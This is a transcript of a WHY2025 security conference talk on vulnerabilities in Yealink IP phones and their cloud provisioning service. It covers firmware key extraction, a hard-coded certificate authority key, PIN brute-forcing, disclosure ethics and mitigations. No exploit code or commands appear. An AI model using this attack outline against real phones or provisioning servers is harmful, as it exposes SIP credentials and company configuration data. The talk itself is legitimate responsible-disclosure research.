WHY 2025 - Die Hardcoded: Unlocking Yealink's (weakest) secrets
2025/08/11
Jeroen Hermans

At WHY2025 i gave a talk about security of Yealink security together with Stefan Gloor
In a follow-up research after the last publication i teamed up with Stefan Gloor from Switzerland that resulted in the presentation below that received very positive reviews.
The video
The text
Okay. So, without further ado, I’m going to introduce Jeroen and Stefan
who are going to be talking to us about Yealink and firmware vulnerabilities. And actually the start
of WHY, their company has just turned 23 years old. So, congratulations on that. and I will pass over to you to tell us about your research. Thank you.
Yes. Thank you so much for the nice introduction and thank you all for coming. We really appreciate your interest in our work. So let’s get started with the talk. So first I’d like to start with a short agenda of today’s presentation. So I will start with a short introduction about ourselves and Yealink. Then I’ll quickly go over through how this project began. how in previous work we were able to break firmware encryption of these devices and then we’ll continue on to the main part of
the presentation where we look at the new phones at the improvements and new technologies and we also take a look at the cloud service that the manufacturer provides.
Then we’ll go over our disclosure disclosure process for the vulnerabilities we found and then finally the outlook.
Yes. So first quickly about me. My name is Jeroen Hermans and as I said before I founded my company CloudAware in 2002. I specialize in cyber security and I do public speaking. My company is based in The Hague here in the Netherlands and you can find me here on WHY2025 in the Swiss village.
Yes, my name is Stefan Gloor. I’m an electrical engineer by training and an embedded software developer currently by day and in my free time I like to reverse engineer and break embedded devices of all sorts. I live in Zurich, Switzerland and you can find my contact information here and here on campus. I’m also in the Swiss village.
So what’s Yealink? Yealink is a leading manufacturer of IP phones and other telecommunication equipment such as desktop VIP IP phones which you can see here video conferencing cameras and all these kinds of things. They’re a fairly large corporation. They have multiple locations worldwide.
Their headquarter is or used to be in China and now they’re seem to be moving to Singapore.
Well, let’s start where this project began once upon a time and it starts a bit sad and it’s in 2016 when my dad died and I had to move a lot of telecom equipment to the garage of my parents’ place. and obviously insurance wise that was highly undesirable and I actually had to hire private security to guard my parents’ place while my father was being buried.
So I knew something had to change and provisioning is the word that you use then. so provisioning basically means that you ship the equipment directly to your customer and the first time the equipment boots it gets configured automatically. When I started implementing this provisioning system, I immediately found that there was an AES key for encryption in this system that was leaked almost 10 years ago and it was to be found on GitHub. So that was highly suboptimal. Then I started doing more research into security of Yealink more broadly in 2022 and in 2024 I met up with Stefan here. We met up in Switzerland in Zurich and we teamed up to bring this research to the next level.
So first 2022 to 2024. Very quickly a summary there was a hard-coded AIS key that was leaked. It was on GitHub for a very long time already. Yealink replaced it by RSA encryption but they immediately leaked the private key of the RSA. So that was also not optimal. They misinterpreted the SIP RFC a few times and they claimed to have a GDPR certificate which was issued by TÜV and I asked TÜV about it because they issued this certificate and they responded with cancelling the certificate immediately.
Then in the end at the after publications I received legal threats by the Dutch importer of Yealink and I received two summons which caused me to hold them up during a video that I had to post online to explain things what was happening.
Yes. So for my story, I started in 2024 to reverse engineer yielding phones. Basically just out of a coincidence that I got my hands on hands on one and yeah, out of curiosity, I wanted to find
out how it worked. And during my reverse engineering efforts, I stumbled upon some very interesting design choices, you could say. And yeah, I wrote a blog post about it, about my findings and how I discovered the the architecture and reverse engineered the firmware in more detail. I started to look at the firmware which is provided by the manufacturer through encrypted ROM
files. So the normal workflow would be that the manufacturer provides this file and you can download that from from their website and then you can download it to your phone using the local web interface or some other automated system.
This encryption of the ROM files is actually implemented as a a custom cryptography. and a lot of work has already been done here in reverse engineering and there are also tools available. It’s actually a custom block cipher using an XOR with a a static key. So it was fairly easy to reverse engineer already.
But I couldn’t use these existing tools for the new firmware as the new firmware seemed to employ some new mechanism with presumably a new key. So what I did I investigated more deeply and I found what I call a hardware assisted AES. So there you have a microcontroller that is used to derive the AES key in a challenge response fashion you could say. So this key can easily be extracted by sniffing the unencrypted serial bus between the main CPU and the microcontroller and therefore you can obtain the key because the main CPU will just send a value to the microcontroller.
The microcontroller will apply some magic function to it and then returns the value back to the main CPU. And these return values are concatenated together to yield the key. And of course since you always need to arrive at the same key to be able to decrypt the firmware if you sniff this key once and have the key then you can always decrypt this firmware. And that’s what I did and so I could analyse it further.
Then I could also get code execution via the update mechanism. This is because the update binary did not have any signature verification mechanism at all. So you could just basically install everything anything that you that you wanted. Because yeah I just had to understand the custom file format and yes of course you become root because the updater also runs as root.
In particular I exploited this handy system shell command that was already there. So I just had to patch this string and then you can run whatever you want.
Yes. So that this is then how we met. We had a mutual interest in Yealink security. So we set up the meeting in Zurich and decided to look at new Yealink models and especially their cloud infrastructure. So that has all already been published mostly that’s already done in previous work. So what has changed? What surely everything’s fixed now right? So to investigate this question, we started with a new phone in particular a SIP T44U which you can see here. We chose this device because it’s the latest from the series. It seemed to be a nice new phone that is definitely not EOL and definitely has firmware support. So it’s definitely a good choice. So I analysed this firmware again and what I found is that the basic custom cryptography is still the same which kind of makes sense because presumably you need to maintain some forward and backward compatibility.
Also they’re still using the same microcontroller trick to get the encryption key but they introduced a signature check for the upgrade binary. So now it’s actually not that easy anymore to get custom code running or at least not with the same trick. And in the new hardware they they introduced a new chipset that actually allows you to do secure boot and they did implement that with a hardware trust anchor. So that’s actually a nice improvement there security wise.
So cloud provisioning, what could possibly go wrong? So let’s first have a look at what the cloud provisioning is and I made a picture for this. And on the left hand side you can see a Yealink phone
just like you can see here. And in the middle you can see the internet and on the right hand side you see the Yealink controlled RPS server, the remote provisioning service. First the phone asks so “where can I find my configuration?” So the question is not “what is my configuration” it asks “where is my configuration”. The RPS server of Yealink responds by “here are the credentials and URL to access your configuration”. It then asks “hello I’m device XYZ give me my configuration” to the customer provisioning server. This can be a customer control provisioning server, could be some external service and that server responds with an XML document that says “here’s the configuration”.
So what is in this provisioning data? Well, it’s a huge template document.
I urge you to have a look at it. There’s a lot of information in there. But let’s have a look at a few. SIP credentials, obviously username, password, SIP server URL. There’s phone book data in there. You don’t want that leaked. The provisioning server credentials as key, HTTP, HTTP
authentication information, network information of your company, VLAN information, TR069, server certificate, XML push server URLs, LDAP credentials, you name it. There’s
user data in there. BLF, busy lamp fields. Those are the shiny lights that you see on the edge here that indicate whether the CEO is actually in a call or not. Hotdesking information is also in there. Action URLs that you can set for callbacks to a web server. and much much more. It’s a huge document and I urge you to have a look at it.
Yes. and to authenticate the phone towards the RPS system, they use client certificates issued by a CA by Yealink. And these certificates are used to uniquely identify a device towards the RPS system. So the RPS system can decide whether or not to give that phone the credentials of the
configuration server. But unfortunately the CA private key was hard coded into the firmware binary.
Although it was obfuscated with a static AES key, it was fairly easy to extract it. And with that we had full access to the certificate authority which allowed us to issue arbitrary client certificates for an arbitrary phone.
They did employ also an authentication token as kind of an additional layer of security in the in the RPS authentication but also here it’s a static derivation algorithm using a hard-coded AES key it does contain five digits of the serial number as a 2FA pin and so actually, these five digits are everything you need to know to be able to create an authentication token for a particular phone. So, in summary, the authentication to the RPS system is completely broken.
This is also what we demonstrated here in our proof of concept. We created a little web-based tool where you can enter the MAC address of the phone that you’re targeting and the serial number or the five digits of the serial number. Then press enter and the tool will yield all the configuration files of that phone.
Yes. So this is the second round of publications that I’m doing at Yealink. And the last time Yealink was not very happy with me. So they thought I was so cool that they actually froze my enterprise. So I was no longer able to log in to the management cloud service of of Yealink. That was very unfortunate. Luckily the RPS management platform also has an API and they forgot to block that.
So that was a bit unfortunate. but luckily there was a CVE issued and it is a bit a lengthy document but I think you can look it up under under this number.
Yes. Also, the API allows you to specify certificates that are used by the phone when authenticating the configuration server. And here, if you look closely, it actually does not validate what you upload, whether it’s a certificate or just random data. So, in short, that’s another CVE.
Also, what about rate limits? Uh, I mean, we saw this that you need the serial number in order to create the authentication token. Well, there are no rate limits. You can just brute force this pin. And actually, because this pin is not completely random or it’s not uniquely or uniformly distributed, um, it makes it even easier.
So we also wrote a little tool to brute force the 2FA to break the encryption and that also gave us a CVE.
Also the API allows you to enumerate MAC addresses. So you can just iterate through MAC addresses to see whether or not they are enrolled in the RPS service. So making the painful summary. So we have a few CVEs for rate limiting. The API lacks rate limiting. we have an authentication bypass for for blocked accounts. We have a certificate upload function that lacks input validation. and we actually have two CVEs that are actually assigned and not published yet. One is for the leaked private key of the certificate authority and one is for the AES key for the encryption of the firmware.
One more thing, welcome everyone to Europe and in Europe we have the GDPR. and on the website of Yealink you can find that they’re very proud to have this logo on there and it says a download report. So obviously I want to have a look at this report because the last one was retracted by to and it says this time I can’t download it. I need to ask for this document and obviously I did and Yealink said well it’s a bit difficult. You have to sign an NDA etc etc but we can give you this
document and this is a screenshot of that document. It is part of the document.
And it is a bit of an interesting document because it says TÜV SÜD and it has a service period from the 1st of January to 31st of December. And so I thought let’s have a look at the at the metadata of this PDF. And it’s it’s a bit of interesting metadata because it’s it the author is not it’s not TÜV or
Yealink it’s Huawei. Okay. And and it’s produced on May 29th which is an interesting timing because the document is already valid from the 1st of January. But it’s extra interesting because one week before I sent this email.
“Hello, my name is Jeroen Hermans and I have been in contact with Yealink before about vulnerabilities. Unfortunately, I have to contact you again about a series of vulnerabilities I found together with my fellow security researcher Stefan Gloor.”
So that is an interesting timing because it is just a week before. I don’t know why that was. What’s more interesting is that the same document is edited one day later and it is edited by an open-source software package called iText version 5.5.10. Now version 5.5.10 is on GitHub and is released in 2016 and well given the security history of PDF I think that’s a bit of a risk.
So obviously this asks for questions. So I did and I asked a lot of questions and I asked is this even your document and it doesn’t mention a certificate number. It’s untraceable. It doesn’t say what is tested. It doesn’t say to what standard it was tested. It doesn’t mention an issue date. It’s signed by someone I cannot Google as an employee of TÜV is this an employee. It says it’s created by Huawei 5 months after it went into action. Can you explain the timeline? It was edited by a very old open-source piece of software. Can you explain this? Is this the way that TÜV would like to operate?
And legally, I’m going to show you the full response that I received from, TÜV and it says this. Please read it back in in the recordings, but there are two things that I would like to mark out. The first one is this is not a certificate. So that’s why it’s untraceable. It’s basically a document that says that to did some work for for Yealink and that that’s it. And the second thing is it is indeed a document from TÜV Shanghai.
So, there’s a lot of facts and information in there and I’m not entirely sure what I have to find think about those facts, but those are the facts. So, let’s fix things. we have to disclose at one point in time, right? We can’t keep this to ourselves. So, first we need a legal framework. And we thought a good place to start with the legal framework is the convention of protection of human rights and fundamental freedoms from 1950 in Rome.
And it states the following. The exercise of the freedoms are necessary in a democratic society in the interest of national security, territorial integrity, public safety, prevention of the disorder of crime, blah blah blah, prevention of reputation of rights of others and disclosure of information. definitely what we’re talking about here. So, that’s article 10 of this of the convention of
protection of human rights. So, yeah, I think that’s that’s usable. And this was also reaffirmed by the Dutch DA office, the Openbaar Ministerie in Dutch. And they have a document online about ethical hacking and it states the following in Dutch and I translated it for you.
There are three things that you need to take into account in order to be on the
legal side of things. Was the action that you carried out in the context of a legitimate societal interest? Well, we think it is. Unfortunately, we told the organizations that this is about that we wouldn’t disclose who that is, but there is definitely a very legitimate societal interest at play
here.
The second one is, is it proportionate? In other words, did you not go any further than was needed to prove what you wanted to do? For example, we did this by buying our own equipment.
The third one is subsidiary. In other words, were there less intrusive ways to achieve it? For example, when we went to enumerate, we didn’t do this in a script kiddy way. We actually constantly monitored the response times of the RPS servers. And when that response time went up, we throttled. So we could have done it faster probably, but we didn’t because we wanted to be on a legal site correctly and we didn’t want to break anything for everyone in the world.
So disclosure procedures are complicated. And often it’s more an NDA. In the case of Yealink, this was a very interesting one because in the case of Yealink, the the vulnerability disclosure procedure said that you would transfer all your intellectual property of your findings to Yealink. I’m not saying that they would, but it would create an opportunity for Yealink to sue you for IP infringement if you would ever publish about your findings. And I think that’s a lot easier than trying to sue someone because they were an ethical hacker. So we rejected their vulnerability disclosure procedure very first email and we said we have our own vulnerability disclosure procedure. We are here to help you. sometimes this is a bit complicated for the manufacturer and the government organizations involved but I think in the end everyone said listen we believe that you are doing the right thing and and yeah you thought about this.
We feel that standard vulnerability disclosures are unfair to the victims sometimes also called customers. You give three months or maybe half a year to a manufacturer and the manufacturer has all this time to fix the things and then we go to a full disclosure and it’s dumped onto the world and then every IT team has to work weekends to fix it and to mitigate and we feel that’s very unfair. So what we did is we also contacted important and large customers of Yealink. It was very easy because they’re all on the website of Yealink and we had some meetings with these people and some of them said actually we really appreciate that you contact us but this is our worst nightmare. So we also contacted National Cyber Security Centres in order to be sure that government organizations were also covered by this.
So timeline is we contacted Yealink on May 19th just before that to document remember and they responded with advising to update all your firmware and they did that last time too. They stated again that this is only about end of life devices and obviously there are security issues with end of life devices. We cannot say anything about end of life devices but in fact we actually bought the very latest and newest of their phones. So this is absolutely untrue and unfortunately very quickly after we started our vulnerability disclosure the manufacturer weld went public with their advisory.
Now that’s new and that also created a situation where we had to act ourselves which is not the way we wanted to to to do.
It led to a few publications on our own blog posts. Das Netz Ist Politisch published an amazing article by Marcel Waldvogel. He’s actually here in here today. The article is amazing and I urge you to read it. It’s in German but Google translate will obviously help you. Well, we already saw a lot of CVEs and more to come.
I think Yealink also saw that going full public with their advisory was maybe not the best idea. So they said now it’s a non-public link and you can no longer access it because and you can see there in the quotes it’s not my wording it’s theirs. It has “confidential client communication” in it. Now it’s their wording not mine I don’t want to change anything about that. So I asked for a access code because obviously this is about our disclosure and I think it would be interesting to read what the manufacturer themselves want to disclose about it. Unfortunately they didn’t react to that request. Fortunately we are security experts. So we asked can you give the access code and we are security experts. So we looked in the source code.
I did not believe this. I had to actually copy this password myself and it did work. Yes, so, let’s have a look at the future then. Yes. So let’s make an outlook. What can we take from our findings? Well, first we’ll quickly go through some mitigation steps that we believe could be helpful to reduce the risk of the vulnerabilities that we found being exploited. So in general, network isolation is always helpful. It’s always helpful to segment different parts of your network. So in particular, this would mean that you would not have your configuration server that holds all this sensitive data out accessible from the internet but have it isolated through some physical network or VLAN or IP filtering or whatever. We also think that the manufacturer could employ some one-time provisioning
scheme. So that the configuration data is only accessible once as you would think such a phone would all only need to be configured once. So this could be implemented with some cryptographic keys or maybe a provisioning URL that expires or something like that. Also, there could be a proper out of band authentication that you would need to verify that you are actually trying to reconfigure your phone. So, you’re actually like allowed to access the configurations. And yeah, if possible, don’t use RPS at all. I mean, it’s always better to not trust and rely on some third party
infrastructure. with your sensitive data.
So, the takeaways of this talk in summary, don’t roll your own crypto. That’s never a good idea. What’s also a bad idea is hard coding cryptographic keys. In general, stick to design to security
design principles. It’s never a good idea to have your CA replicated thousands of times on on each phone. And if you think you know better than the security design principles, you you probably don’t. Yeah. and some future work you could you could focus on if you’re inspired by this talk then you could look at are the issues really fixed as promised by the manufacturer and how exactly is that implemented you could also look at other devices they have a lot of different devices different categories of devices also they have Microsoft teams enabled phones that have a different architecture.
Yeah, video conferencing equipment. Also, it will be interesting to look how other manufacturers are doing it. And yes, that’s concludes our talk. Thank you very much for your attention.